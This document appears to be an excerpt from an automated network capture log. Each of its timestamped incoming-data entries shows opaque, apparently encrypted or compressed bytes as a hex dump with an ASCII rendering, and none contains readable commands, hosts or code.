                                                                                                                                                            2022-09-29 12:44:59 UTC6421INData Raw: 21 bd 77 86 73 eb 7b de 01 ac 85 98 9f c6 fa 53 d7 6c 3a 8e dc cf c3 80 8e 3a 96 7e f8 bd a6 39 0b f5 fb ed f3 d2 06 3c d4 8d ab f8 a8 ea 72 bd 22 4b 03 72 27 98 d7 06 08 c0 b9 b6 ee 2c 61 6c 1c 70 ef 4d 35 bd 64 ae 8b bc ba f3 b0 b5 74 4b 97 72 44 1c 7d 5d 54 16 b1 53 9f e7 99 9b ef 90 bf 35 55 35 48 40 fa 83 ac fa 6c b0 79 f9 26 e7 ed e7 0a 5e 69 80 0e c2 a6 15 ca 57 18 3e 66 da f0 8c bd 3b 9f bd 1c d6 12 f7 f0 30 0e 68 5f 0b 84 53 ec 44 5d 03 c7 28 a8 64 59 63 7d d5 54 2a 86 b8 37 a5 b6 4c 5d 8e 25 67 72 95 6b 67 da 08 ef d9 41 07 47 ea 15 70 3f a9 4a 78 07 e4 ba 2b 85 64 b5 98 ee b7 85 0a bf cd 72 df 81 4a c3 ba c5 74 45 50 dc ca da 94 26 6e b6 d4 93 f0 80 71 18 e2 23 59 06 fe e0 26 aa 89 01 29 b1 64 83 ec fd 68 43 3a 3c 1c a1 41 4d ec 1d b6 e3 e0 77
                                                                                                                                                            Data Ascii: !ws{Sl::~9<r"Kr',alpM5dtKrD}]TS5U5H@ly&^iW>f;0h_SD](dYc}T*7L]%grkgAGp?Jx+drJtEP&nq#Y&)dhC:<AMw
                                                                                                                                                            2022-09-29 12:44:59 UTC6437INData Raw: 92 1d 02 ac 0f 2e 5d ba de 16 4c a6 66 be 46 e8 b8 15 02 63 f3 9a 90 14 16 6f d0 43 97 97 30 a3 4c 30 f7 fb c0 d7 c2 c2 b0 1b 44 08 78 4e a7 b5 76 6c 40 69 1b b2 97 7c 7b 6f 0e aa 76 ed 5c 0d 88 1c 9c ca 2f 88 2e a2 1a f9 71 6f d6 89 53 00 c7 da 61 c5 d7 70 48 0c 19 3e 0c 04 a0 71 a2 33 16 73 bc 63 7a 8c 41 67 df 4e 18 c2 74 92 12 88 83 53 97 55 4c 5e b0 3f ff 70 f1 f8 55 12 e7 fe d8 58 f1 48 58 11 f1 a3 83 d2 30 cb 8c 21 4d 30 ef f3 04 15 a1 41 f9 ce 26 e5 1b 07 f8 ee ce d1 47 a8 c2 6b ba ee 82 08 cb 2f b8 c6 cd c7 3c 03 52 03 4a 21 48 f8 44 4e f7 12 95 f1 9a 52 82 b5 7e a6 dd 3c 68 6a 55 69 d2 f0 62 cd 76 42 4d 7f b0 82 64 5b 8f 7e 27 3d 7c dc f9 f9 a7 cd 5e 1f 8d f4 9c ba 79 b2 d8 6f 6e 87 86 6b 0e 1f 98 ec 5a 8b 37 13 60 65 97 b1 93 0b b3 47 11 24 dd
                                                                                                                                                            Data Ascii: .]LfFcoC0L0DxNvl@i|{ov\/.qoSapH>q3sczAgNtSUL^?pUXHX0!M0A&Gk/<RJ!HDNR~<hjUibvBMd[~'=|^yonkZ7`eG$
                                                                                                                                                            2022-09-29 12:44:59 UTC6453INData Raw: 67 c7 6e 65 dc 4a f5 42 03 d7 8d 33 1b c0 2b d3 48 67 d7 92 53 d5 99 0d aa 0b 4f ba 96 bf 4a ef 55 e4 7c 43 cf 52 c6 aa 0b 36 38 d3 fe d4 48 b1 ea ae d8 e2 29 80 a8 02 f8 eb 0e 22 d2 84 b9 09 d3 f4 58 87 64 6a 4b 3e 5b e9 5c a7 ee 4c 7f be 06 fe cb ab ea 59 df 59 d3 53 b2 33 6d 9c e9 de 96 c0 11 fd 3f 37 d6 0d 72 b0 ee c6 79 1e 9f d6 14 ce 93 3b bf 9e 8b 07 c1 90 49 0d 5d ef f9 c6 5c d9 78 4b 2b e2 9f 8c 27 b3 58 e6 05 6b d2 96 a8 a4 79 8d cc 4b 50 9c 57 74 ed 19 93 1a e3 62 8f f6 30 e6 ee bc 55 d7 db fb af 6a c4 0e 13 d5 0c 38 c2 3f 46 91 8a 10 b4 71 e4 02 37 1a a6 9d 51 82 cf dd 93 0e ba 03 be 7a e4 43 e3 f3 08 ea e9 ff 61 65 d3 c7 61 1d 82 b5 6a 45 2b 80 51 84 29 98 59 c3 cf 47 79 8d a7 2e f6 0f 75 7d 8a 5e f7 73 e5 a6 c7 2c 3b f7 51 41 d0 aa a4 2f 69
                                                                                                                                                            Data Ascii: gneJB3+HgSOJU|CR68H)"XdjK>[\LYYS3m?7ry;I]\xK+'XkyKPWtb0Uj8?Fq7QzCaeajE+Q)YGy.u}^s,;QA/i
                                                                                                                                                            2022-09-29 12:44:59 UTC6469INData Raw: ad 54 62 67 5c 4a 44 47 d2 6b 39 92 d0 bb 7d d6 45 05 4b d7 e1 bd 64 f9 98 dd 15 5e 8d 4b 7a ae df a7 fe 48 c1 cd 05 c3 d3 c2 67 b2 af b7 c1 87 a2 da 83 70 a8 c4 c2 3a ba 6d ef 70 09 78 c1 ed 13 16 35 e8 8b 22 e4 02 94 60 21 11 2c 3d f7 a9 28 b1 5d 7c 03 f4 24 d5 91 6a fa 6c 73 c8 a3 b9 1e 6c b2 be ae 14 e7 50 42 a1 50 d5 b0 02 86 f4 9a a5 46 d6 22 61 a0 38 84 bd d2 0b 8f f8 27 f5 50 92 58 66 98 79 5d e3 b0 99 dc eb 58 d6 b3 69 eb a9 10 de 73 0d 6b c0 bf b8 45 a6 00 b2 c3 cc 11 27 e8 1e 64 74 82 cd cc a9 fe a9 d0 93 87 9f b2 c2 34 b9 94 08 48 72 a3 4a 15 54 2d 52 42 3c 4f bc af 02 3c 2f a7 be 88 9a fb 69 65 3d 6a 74 20 cc 98 10 24 ee 19 fa c0 81 b1 5e e1 87 c4 7f ce eb ef ef 22 b5 4f 94 7f 96 00 63 45 4b 98 00 c1 12 32 25 de f0 6b e6 9f 78 17 1b 39 6a 7d
                                                                                                                                                            Data Ascii: Tbg\JDGk9}EKd^KzHgp:mpx5"`!,=(]|$jlslPBPF"a8'PXfy]XiskE'dt4HrJT-RB<O</ie=jt $^"OcEK2%kx9j}
                                                                                                                                                            2022-09-29 12:44:59 UTC6485INData Raw: 74 be 36 56 cd ed 65 85 d6 3b 9f 9a b8 f5 21 7a 85 fe 93 cf 62 fb ac cc 12 14 de c3 17 53 3a 47 74 09 6d aa 62 cc 3d 7f 6f 9d ef 87 a5 cd c8 b7 cf 45 32 71 37 f8 35 d8 9e 26 bd 9e cf ae 2c 97 4b 51 42 14 05 4a 33 5a 83 01 cb f6 8c 2d 2f c5 2c cb 81 c8 f1 71 a1 33 81 99 43 5a 18 52 66 e3 08 1c d0 74 b9 87 e2 19 df 71 7d f6 8f 64 70 75 33 47 bf 6c 0f 5d 2a 0c 5a 11 9f 92 c8 b5 f8 e7 f1 13 c9 59 9f 1d db a8 d0 97 06 f5 d2 72 1c e2 1f 00 fa d7 70 6b 19 2d 47 2d 42 08 f2 10 f7 6f ef 69 29 1e cd 36 f8 14 dd 71 bf d4 e1 ba 7a 82 2e a9 4f ad 8e 48 aa a9 c0 48 8d 63 9b 82 49 f5 fc a8 4f 7a b4 61 83 97 52 fe 79 16 65 a2 9e dd fd 21 d9 41 ac c0 e8 d9 b2 57 84 64 a0 5a a3 09 5f 1f 9d f3 0f 39 81 87 a8 9e 45 77 bb 91 7f 3e 3f 53 24 62 c7 4c 5f 87 1f ce cf 79 4d 57 83
                                                                                                                                                            Data Ascii: t6Ve;!zbS:Gtmb=oE2q75&,KQBJ3Z-/,q3CZRftq}dpu3Gl]*ZYrpk-G-Boi)6qz.OHHcIOzaRye!AWdZ_9Ew>?S$bL_yMW
                                                                                                                                                            2022-09-29 12:44:59 UTC6501INData Raw: 95 3c df 66 4d cf cd 50 64 54 a9 b5 3b f5 d5 6f 10 f7 65 02 da c3 a6 0e 74 e5 94 51 af d7 91 ce 61 34 31 7e 1d e7 47 3a 68 37 0c 33 20 e8 17 da 95 ff cb 23 f6 69 30 5d 93 66 b7 ec 38 c2 a8 25 9f 25 d0 b4 92 ac 08 0b 88 35 68 97 78 0c 49 99 60 47 73 4d 51 d8 7d e0 80 35 89 6c fa 30 89 5b b0 cf fb 0b 2e e2 b6 c8 80 0a 1d cc aa 04 90 3f 06 24 28 ce ef 6c bb 8b 0d 8e d4 43 45 8d 94 a2 d2 9b dc ab c7 a6 5a d3 a2 ee 9f 13 ad c1 d8 69 d9 4e da 7f 13 a3 4d 61 08 04 a1 9f 39 8d 79 ba 7f 62 9b 45 2e e8 23 e2 18 83 bf ea 6d 7e c3 71 df eb 5f e0 ad 37 16 4b 47 77 28 e6 0d ab 4a 13 93 bb cd 55 aa ff ab 6b 5d 7d d6 e8 00 c3 5f 7b 49 e2 2d 51 ab 66 33 52 78 ea ad 74 f5 65 9b f7 ed 8b f1 1b f9 be ac 34 6b 43 c9 6b 3f fb 2d 10 39 61 d6 d2 a0 97 e2 62 62 ae 5b 8f df 79 d9
                                                                                                                                                            Data Ascii: <fMPdT;oetQa41~G:h73 #i0]f8%%5hxI`GsMQ}5l0[.?$(lCEZiNMa9ybE.#m~q_7KGw(JUk]}_{I-Qf3Rxte4kCk?-9abb[y
                                                                                                                                                            2022-09-29 12:44:59 UTC6517INData Raw: e0 dd 2c 18 a4 42 6c 29 a1 b2 96 c0 fe b7 e7 fb 80 d4 d5 9f 7b 1d 1f 58 3b a6 bd 58 0e b0 58 36 65 d1 0d df e9 f3 55 b9 b8 b4 7a ad b8 0f 0e ea 57 c5 cb 6a 4c bd 17 fe 91 b9 8e 92 ef 23 3d 79 22 c0 4b d0 d6 02 4a 42 68 c8 e3 ca c1 46 ee 9c 4c 6d 51 c8 45 c5 97 4a a5 6f 13 41 98 82 d9 00 4b bd b2 63 53 7c c4 ad cb 0f a1 4b b0 8b dd 4b cd 5c 49 88 44 24 f6 54 43 85 9b f4 5a 48 d0 ae ce 36 4b d1 cd 2c f7 3f 74 26 56 e0 23 eb f5 46 b4 21 f8 07 71 cf 38 92 ac 47 f0 93 42 05 ac c4 95 27 65 aa f2 d2 f3 6a 30 89 35 59 ef 89 05 66 19 3a bc ee 7a 3d a9 e6 09 4f 80 21 df cf 7c 82 46 97 2f f7 ef 2c f6 02 d9 2b b1 c9 98 4e cb 63 ec 24 c3 81 ac e8 6f c1 52 1d ce 48 01 6c 32 e9 ea 61 0d fd 49 35 d9 73 fa 88 1c 63 33 ef 20 22 8b 35 fd 75 0a be ac 51 89 e6 b5 d5 6d 4d d2
                                                                                                                                                            Data Ascii: ,Bl){X;XX6eUzWjL#=y"KJBhFLmQEJoAKcS|KK\ID$TCZH6K,?t&V#F!q8GB'ej05Yf:z=O!|F/,+Nc$oRHl2aI5sc3 "5uQmM
                                                                                                                                                            2022-09-29 12:44:59 UTC6533INData Raw: 17 a2 9e 08 58 73 d7 67 8a 2a 11 0d b1 01 b3 4f 00 82 96 24 94 8c fc 3e cc 1a 89 ff 62 69 15 35 a8 a4 38 f5 a8 47 37 f9 e6 0b 82 32 bf 3c 20 12 9b 34 26 fe 75 e2 2c a1 ee 58 0e 24 07 4b ef 14 2e 6d d5 de e8 28 4e e1 c3 9c d3 09 89 b4 ea 3e 85 6c 8b da 83 5c bf 0f 00 ba 37 b5 d8 e1 9b 7f f6 06 af e5 32 5d 08 93 7b e6 da 49 e4 76 61 42 76 84 80 e7 9e 30 09 e8 ef bd 6d 68 40 da 31 91 71 50 2f e1 32 c5 00 a7 5b a8 92 69 3e ca 31 c5 11 c4 ff 45 4b 61 17 43 5e 3f a4 3e e2 51 7b 97 24 d1 ea 26 c8 00 74 e0 a4 0a a1 dd a5 95 17 a7 31 82 82 95 9e 6b b8 17 da 6c 9b 56 f9 be d8 b3 fc b9 90 ae 7e 9e df aa 24 66 59 f4 2b 9b d1 52 15 3d 5d f1 0c 7f cf bc cf 5b 0c 36 2c 02 1d 78 8e b1 b8 84 15 d6 2f 89 d6 44 19 45 85 d9 2e f5 9e b9 4d ef b9 bd a1 6e 1e da 8f 17 36 16 c2
                                                                                                                                                            Data Ascii: Xsg*O$>bi58G72< 4&u,X$K.m(N>l\72]{IvaBv0mh@1qP/2[i>1EKaC^?>Q{$&t1klV~$fY+R=][6,x/DE.Mn6
                                                                                                                                                            2022-09-29 12:44:59 UTC6549INData Raw: 13 71 14 ec 91 58 3f 37 38 88 24 65 8a e8 ae ac 99 6a 5a 51 10 4f 9d 00 a7 4c 3f 59 10 04 b9 30 d3 4c 0f 78 98 27 c6 3d 84 f9 fd 36 68 33 6b f1 c3 3a f9 1b ac d8 7a ac 86 a3 d4 d9 d1 11 4b 8e 33 47 53 d8 cf 89 1e 47 43 df 41 c4 34 b0 d6 3b d3 ff 1a bd 79 9a 47 87 a9 b6 51 01 35 fe 95 da d3 76 d8 10 20 df 5b e6 22 58 9b 21 dd f4 5e 62 b2 9e b0 ad 68 40 a9 f5 d9 05 fb 04 70 3e 2a 1d 8f 10 9f a6 49 2e 05 72 cd eb 08 b6 a6 27 2f d8 91 e0 aa f4 3a 7b d0 8f 8a ea d7 b7 ee 7e bd 22 da a9 d6 1f cd c6 86 ef e2 40 b4 1e a1 c0 cf 9b 7b 09 a9 8e d5 c2 3c 89 c1 f1 4c 52 e9 4d 09 14 37 8f c5 f1 9e f8 b0 49 34 68 cb 21 2e 65 0b 65 e5 ac 0d ca 69 46 0d 16 5d 04 b9 b0 f0 d2 c2 f1 28 39 69 b5 2d af c4 ee 45 64 31 70 f9 4f 50 05 b5 4c e5 7f 2b 14 1e 79 16 79 76 af 22 68 f5
                                                                                                                                                            Data Ascii: qX?78$ejZQOL?Y0Lx'=6h3k:zK3GSGCA4;yGQ5v ["X!^bh@p>*I.r'/:{~"@{<LRM7I4h!.eeiF](9i-Ed1pOPL+yyv"h
                                                                                                                                                            2022-09-29 12:44:59 UTC6565INData Raw: 2c e0 f6 9d 51 8d 55 e6 03 76 d2 f8 38 72 20 ba be 8a 08 03 91 a3 89 d6 be 26 ec ed 32 2b 91 52 f1 a9 da 22 37 dd 5e a9 0a f8 9f 29 d5 e1 a4 dc 49 eb 88 08 13 b3 21 96 b5 c8 95 08 75 67 40 1b 2a c9 d7 23 71 b3 8c b8 43 2c af d9 62 f3 a7 6e e8 d4 07 a1 b4 b9 94 2d c1 44 74 09 a8 4d 0d 6e fa 78 05 58 19 36 af 04 99 41 68 b7 84 fc 0b 11 5a bb ee 2f dd 2a 52 54 b8 d7 0d ce dc 88 81 af b6 9f 59 b7 3b a1 fa 10 54 2c 93 f1 c7 eb f1 38 1c 48 9f f4 3e 1b 55 e2 31 5a 18 ef f0 65 b8 5f de 44 3a b1 86 2a 91 41 64 0b 8f f6 8f f0 41 d2 29 c3 18 d2 88 5a 70 9b 82 da cf 45 46 2b 1f 83 d6 77 d8 ab 40 d2 9b 2d 76 d7 02 f5 06 e2 0c 82 2e 34 86 14 f5 67 b7 43 e7 a6 84 d2 57 fc 7a 0d 09 7e 37 44 9a bf 8e 8c 5f df cd a6 2c c1 eb 7d ac ca 93 07 b2 55 be fa ec 9f 85 7a 7b 72 fa
                                                                                                                                                            Data Ascii: ,QUv8r &2+R"7^)I!ug@*#qC,bn-DtMnxX6AhZ/*RTY;T,8H>U1Ze_D:*AdA)ZpEF+w@-v.4gCWz~7D_,}Uz{r
                                                                                                                                                            2022-09-29 12:44:59 UTC6581INData Raw: 58 f6 b2 9b a0 75 11 97 24 ac cb 39 9f 8f 74 f2 a8 ed c6 bd 27 db ec 09 8f eb 32 f8 0d b2 60 25 87 5d 96 06 8d 46 f9 73 eb 6c 7c 1e 5c 17 f8 b1 63 82 3b 4b 63 a6 9d 3f 9e 67 89 d3 57 84 ec cb 79 25 02 77 85 dd 0c 49 da eb c0 d9 0b 51 16 2f 78 f9 09 1b 98 9c eb 81 a2 fc d7 e3 17 e2 0e 70 8d 23 5f 88 d8 2a b7 60 7f cc b4 5c 05 2a a1 2e d8 3c 19 12 2d 76 26 40 1f c6 08 4b f6 60 9d 38 c3 67 e4 fe 1a 2e 72 1b de 93 ac e8 f0 8e 0e c7 b3 03 4b 3b de f5 a5 17 77 ac ab b5 5b 17 22 e8 1a fe 24 17 8a fb f5 e7 7d c3 dd cd 78 9e 49 58 36 22 32 ee ef 00 98 e6 3f 5c 3b 16 e7 38 2f 81 28 13 5e ac 24 06 dd f2 aa 64 33 37 25 cd 8e 08 39 57 7f 76 05 67 39 9d 6d 0a 85 d9 e5 4b 0e 16 35 45 4a 1c 2e 68 1f 51 5f 43 1e 34 76 c9 88 5b 30 58 b4 37 11 28 7e 88 63 4c e2 71 07 cc 4b
                                                                                                                                                            Data Ascii: Xu$9t'2`%]Fsl|\c;Kc?gWy%wIQ/xp#_*`\*.<-v&@K`8g.rK;w["$}xIX6"2?\;8/(^$d37%9Wvg9mK5EJ.hQ_C4v[0X7(~cLqK
                                                                                                                                                            2022-09-29 12:44:59 UTC6597INData Raw: f2 51 e5 d9 3a 46 26 3f db 5a 21 d1 53 9e bc 9b c4 9b 18 79 ae ef b8 95 90 48 0d 93 2c 4b 12 cd 61 d9 1d 3d 07 f0 df 93 b3 21 2b a0 5c 7b 2f ab 41 fc 30 d6 47 f1 60 f4 42 e1 23 6f 19 00 d8 ff 8d 01 b0 0e ca 32 96 de 17 61 76 77 fc dd bf 1f 0a 96 4d e5 2f 56 c4 bf a4 87 04 c5 0a 91 d8 08 1a 5c 00 22 0c b3 0c a4 6b 34 07 02 58 92 78 01 9f 96 a0 4f 89 ac ef cb 5d 97 1e bc 0d b8 f2 74 f6 2f 4f da d2 cd 29 0e a0 34 7e 57 3e 66 ee 78 52 5a fa 1b d6 eb 03 34 7b cc 76 48 06 83 e8 6c 7f 57 0e e7 68 bd a3 3a 6f 46 aa f8 fa d2 34 f3 ca f8 18 b4 09 b3 12 f4 1b 7a f2 fa ec 53 17 fe cc 06 a9 84 d4 9e 85 49 09 68 e1 3c 2b 1e b1 ca 83 8e 92 31 6b 2d 26 70 55 13 47 e3 57 02 2e 91 d9 85 93 2f 67 0f a5 41 ad 13 e6 3a c1 94 22 bb c6 62 8e ed 6c e6 5e 5b 64 5d 8c f9 73 67 7b
                                                                                                                                                            Data Ascii: Q:F&?Z!SyH,Ka=!+\{/A0G`B#o2avwM/V\"k4XxO]t/O)4~W>fxRZ4{vHlWh:oF4zSIh<+1k-&pUGW./gA:"bl^[d]sg{
                                                                                                                                                            2022-09-29 12:44:59 UTC6613INData Raw: cb ca e9 2a f8 d5 98 cf 14 da de b2 18 80 e2 4e 2b 04 80 7c be c1 36 48 a1 c0 09 b4 5b d1 9f f1 c9 48 c0 b0 92 1f 6b 2c 82 4e 16 52 42 15 0a 5a 0f 46 41 91 fa e9 4a 21 e6 61 71 70 75 e5 22 e7 0d b9 38 64 45 40 d7 0f 8c 89 4f ec 9f f9 53 84 7d 23 72 1b 6e aa 76 03 02 70 0f 9f fd 49 3c b6 06 ae a6 e4 3c 69 18 7c 85 13 a3 b6 db 13 65 af 9c 47 8b a5 17 78 58 2b e0 a9 78 f7 b2 0b dd 8c 63 69 8e 2d 1c 2d 4c b0 6b 25 81 69 58 72 6b 94 02 d6 24 d7 94 7c bf 75 87 7b 4e 39 dd 9c 4f d2 26 b7 d4 1d 4d a1 93 90 23 b9 2c ee 1a bf 1d 6e be eb 20 de 78 2b 13 6e 84 7d 18 c6 a3 4e fb b5 a4 96 60 92 80 3f 31 bd f9 53 62 92 0a 9c 41 27 74 c4 f5 6e cc 27 84 65 98 6f 2b a0 77 9e 0f 06 d9 45 36 38 3a ef 4e 61 b9 e3 70 02 1e 8e 46 56 0a 4d fc 5e 2f 7a 8c cd 5e b1 ee 2e 3c 4f 72
                                                                                                                                                            Data Ascii: *N+|6H[Hk,NRBZFAJ!aqpu"8dE@OS}#rnvpI<<i|eGxX+xci--Lk%iXrk$|u{N9O&M#,n x+n}N`?1SbA'tn'eo+wE68:NapFVM^/z^.<Or
                                                                                                                                                            2022-09-29 12:44:59 UTC6629INData Raw: 19 02 6c 6c cb b2 bc e0 9f cb 5e bb 43 b3 54 36 84 35 0b bf 6f 30 ff 32 f6 2c 9c 10 ca 34 a3 06 30 11 e4 3a f6 a0 62 a6 46 5b 5b 90 cb 62 ca 3d 5e db 45 e1 b7 d7 f2 c5 4f b0 b7 c9 97 bd 13 8e 4f 2e 8c 6d 02 4c d3 b0 04 d7 3b 82 01 af 22 4d d6 5b 09 62 88 2a c2 34 c4 ec 3b 97 56 ef 07 53 12 91 41 20 6a 56 56 b9 16 27 c4 04 84 a9 45 4f a6 08 d0 ed 7f 32 13 16 86 b5 d4 be 2c e5 1a be 0f 32 f7 65 3b eb 7d e3 87 f3 df 43 41 67 d0 9c ea 76 c7 57 eb 79 22 8c 1e 3a dd 77 ba e0 03 be 0f 04 01 ef af 16 fa bc c3 91 99 9a 07 68 be 81 66 8d a1 c8 72 29 f4 47 06 3b 87 05 19 ca 14 fc 54 40 3b 00 5b 38 94 c3 9f fc fb 1d be 36 88 29 02 e0 17 59 54 37 63 32 8e 45 ca f2 e3 b5 d2 bf b6 29 b0 9b 6d fb 70 5f b9 5e 86 cd 94 80 17 b7 f1 4c 1e ee 25 76 ec 9e 44 94 91 0b 1f 93 39
                                                                                                                                                            Data Ascii: ll^CT65o02,40:bF[[b=^EOO.mL;"M[b*4;VSA jVV'EO2,2e;}CAgvWy":whfr)G;T@;[86)YT7c2E)mp_^L%vD9
                                                                                                                                                            2022-09-29 12:44:59 UTC6645INData Raw: b2 a6 5f 57 b6 cf 7f 21 1b 25 3e cd 0c cc d2 15 bb 86 85 f7 a3 c7 c6 cf 11 6d 53 a9 48 93 09 d3 22 a5 38 03 07 f9 de c6 f9 97 6a e0 5c bd 8a 6a 78 80 a6 40 a5 f8 95 c7 01 47 cc 23 6b 53 55 eb 63 30 75 0e aa fe b6 78 1f c6 41 66 4a 62 fd 17 56 33 59 dd e1 90 b5 e2 e1 4e d9 61 2c f0 c3 29 9c e8 8a 42 48 19 0d a4 e3 ec 4c 8d 76 67 6f e1 9a 98 61 31 3f ef e5 15 db b0 46 d2 72 35 48 f0 56 bf 87 43 ed ef bf b6 ed 16 f8 cd 4c 89 61 84 29 63 4a 40 78 3e 17 f2 4f 1a 53 e3 18 40 3c 03 4a 02 60 6f 2d 57 6d ed 07 e4 0e 0f 6b 72 e7 47 3a 3c e3 f2 3b 3b df f3 a9 50 e3 9f 65 31 40 cd 12 96 35 6d d9 dc 1d 9d b5 f9 18 b0 92 1e 3a 6f 58 0f 71 3a 9a b9 8a 7d 10 33 30 b5 3e 00 21 06 5a 6f 42 2e 4e 20 26 45 67 1f 17 2b ed 3a 0b 29 93 dc e0 a0 64 8c 2c dc 75 ae e4 c1 d7 58 1d
                                                                                                                                                            Data Ascii: _W!%>mSH"8j\jx@G#kSUc0uxAfJbV3YNa,)BHLvgoa1?Fr5HVCLa)cJ@x>OS@<J`o-WmkrG:<;;Pe1@5m:oXq:}30>!ZoB.N &Eg+:)d,uX
                                                                                                                                                            2022-09-29 12:44:59 UTC6661INData Raw: 72 28 38 28 e4 16 76 4b 78 10 6a 9b 90 d2 f8 2b 4d 10 ae 7b 10 96 c0 d8 8a 95 09 2b c0 85 a9 0f ef 26 3a fa e3 76 55 03 91 a8 36 4b 72 07 9d bd 59 5c 82 0b 53 1a 52 81 45 e4 ef 6f d0 2c f5 4c cf 25 0f c5 3b d2 77 83 a0 c2 15 1a cd 30 ec 29 ca fd 5d 9b 4f 84 69 1e 56 0e bf c0 5a fe ea 5d f7 02 3b 54 74 ca a3 fd d9 27 1f bb 66 c9 20 4e 97 30 b9 cf d5 2e 29 db d8 00 e6 28 12 30 cc ac 4f 40 6b 57 78 aa 10 ab d4 cd 56 81 25 cc 3e c5 f4 05 8c fb 1a 82 54 1b 3b 9d a7 aa 43 cc 00 b8 b0 48 2e 8f 6f 8f 5e d5 0b e7 66 15 4f 4c 94 b0 c2 7b b0 0e 49 d1 b4 ce fc 9a 53 72 dc 9d 2b 75 0b 8b 75 5a ef 8f 58 b5 09 47 bc 43 42 b3 1f 18 38 b7 3a 21 e7 16 00 01 dc 86 b4 af 7c 48 54 b3 ef 62 be 8d 1d 85 a0 87 3c e7 88 71 be a8 0a 1c 49 1d c7 af 7f cf 71 a9 25 38 49 df f4 db 36
                                                                                                                                                            Data Ascii: r(8(vKxj+M{+&:vU6KrY\SREo,L%;w0)]OiVZ];Tt'f N0.)(0O@kWxV%>T;CH.o^fOL{ISr+uuZXGCB8:!|HTb<qIq%8I6
                                                                                                                                                            2022-09-29 12:44:59 UTC6677INData Raw: a9 99 61 68 2b 89 00 d3 34 7a 35 54 59 5b d4 9e d0 17 5e d4 79 55 c8 45 b2 9a 4f 77 f0 1e 52 f5 63 1f 9d 44 e1 7e 9b b3 0e 1c 33 3f a4 90 53 71 8d 18 51 d0 44 cc 5e 29 39 5c c8 46 50 3f c5 b0 2a 8e f2 8c e1 e2 f8 9e 69 89 ed 77 ce 3c 52 30 6c c5 c3 29 f1 77 b1 c1 3e fb d8 b0 98 61 dd 59 07 16 df 75 84 91 71 6f 9e a2 99 30 62 72 3f f9 7c 89 97 28 72 cc 9f 22 f2 41 29 d4 10 a4 8b d1 b8 78 8f 61 57 62 d1 62 26 17 07 ec ed 5b 51 31 ac 0d 53 25 30 15 e9 3e a1 21 2f ae 8e 2e 23 13 9f ab a6 e2 67 a4 8c 5b ba 2e 71 82 97 53 d3 5d 0f 50 3c 2c 52 99 f6 73 49 83 a1 7f f7 cd 7d bb 0b 93 63 35 ae 40 ba 5a e5 64 86 10 e8 b8 b6 47 bb e7 fe c7 e9 92 c9 0a 8f 86 fd 37 1f ce 3b 4a cc d4 10 86 a9 cc 79 a7 b1 48 91 ca 5b 1b 79 c3 86 36 00 d0 b2 83 75 b9 9d e0 e4 2e a7 2e 23
                                                                                                                                                            Data Ascii: ah+4z5TY[^yUEOwRcD~3?SqQD^)9\FP?*iw<R0l)w>aYuqo0br?|(r"A)xaWbb&[Q1S%0>!/.#g[.qS]P<,RsI}c5@ZdG7;JyH[y6u..#
                                                                                                                                                            2022-09-29 12:44:59 UTC6693INData Raw: a5 ff e0 ca ab 7f 60 d3 c2 0c d7 df d1 52 c8 d6 d7 4b 1d b7 0a 48 ae e3 d5 be b1 02 c0 2a de 1c 7e dc 2e 40 07 12 10 85 d3 79 52 32 c9 32 3d 21 9e b1 a4 8b 72 6f 70 59 3c da 90 c9 5c cc b8 18 00 f7 0c 56 ca ec b7 74 72 42 da 47 6e 30 c1 bc a4 f8 37 fc a3 68 62 af a2 f2 06 a7 4a 0b 6a fa a1 c1 d1 b3 91 c6 5f 65 0f 10 5d cf 0d e2 05 79 7f ff 5d c3 52 91 a4 b6 89 10 e7 12 05 cb ec 20 1c bd 7f 85 10 10 73 89 73 41 72 98 e1 2c f4 47 b9 6e 9e b3 c6 5b f2 c4 e5 9e 5b 57 f6 a8 86 42 6f a8 08 7c 1b 88 75 ef 69 3f 3b 0f 13 3d 95 16 eb e3 f3 9e 7d ed be 1e 49 c2 36 f1 d4 d1 b8 6f a3 7e fc 75 41 d1 82 c8 ca 0e e2 10 76 1e 72 6b a3 1a ea 7b 7b 6f 7f 3c 74 2c 3f 24 3a 49 be 2f 2b cc d7 c7 ad 72 e4 88 ea 9d 3d 66 13 2e 09 e6 5e 80 63 0f 41 83 86 e5 f2 ac 60 7d 0c 8e dc
                                                                                                                                                            Data Ascii: `RKH*~.@yR22=!ropY<\VtrBGn07hbJj_e]y]R ssAr,Gn[[WBo|ui?;=}I6o~uAvrk{{o<t,?$:I/+r=f.^cA`}
                                                                                                                                                            2022-09-29 12:44:59 UTC6709INData Raw: bb c4 e5 b7 5b 2f 1f 7a ce 36 87 7c cb 13 6e 41 f1 47 0e 42 22 ef a8 96 62 04 82 6c bf b9 c5 3e 5f b3 56 72 0c 64 dc d5 16 5d 84 cc 75 8a 86 f4 24 36 78 d9 0c b3 8f be 18 8d fc 7e f0 a2 03 7b fd 9b ad 98 01 c6 23 81 ad 1e 80 35 22 e2 cc 62 30 d4 f3 36 72 bd 56 96 df 3f 92 28 77 e2 84 d3 de 6f 7e 5b 97 56 30 5e 12 41 40 63 96 7c 85 17 8a 9f 60 22 8d 2c b8 ca 77 39 a0 69 35 7b f4 ce 17 cb d5 c1 a4 73 02 4c 04 9d 8a 07 4a 36 3b 34 cf 9a ca 0d 77 da 4f 66 a7 62 58 56 b5 ee d0 6a bb c4 3d 36 f8 35 ad 12 e2 55 d2 b3 87 aa 74 4d ac 7e 43 00 58 a7 5f ea 43 33 77 d1 ed d7 35 21 f3 4a 26 78 51 00 22 de 79 9d f8 07 9f fc f1 95 15 28 0a 05 16 38 ad 25 9e be 9c 52 e1 e3 41 83 5f 04 82 e4 76 f7 38 03 18 d5 c3 a3 43 aa 72 2b 45 da a1 3d 74 66 8b 25 fb 45 8d af 17 2e f0
                                                                                                                                                            Data Ascii: [/z6|nAGB"bl>_Vrd]u$6x~{#5"b06rV?(wo~[V0^A@c|`",w9i5{sLJ6;4wOfbXVj=65UtM~CX_C3w5!J&xQ"y(8%RA_v8Cr+E=tf%E.
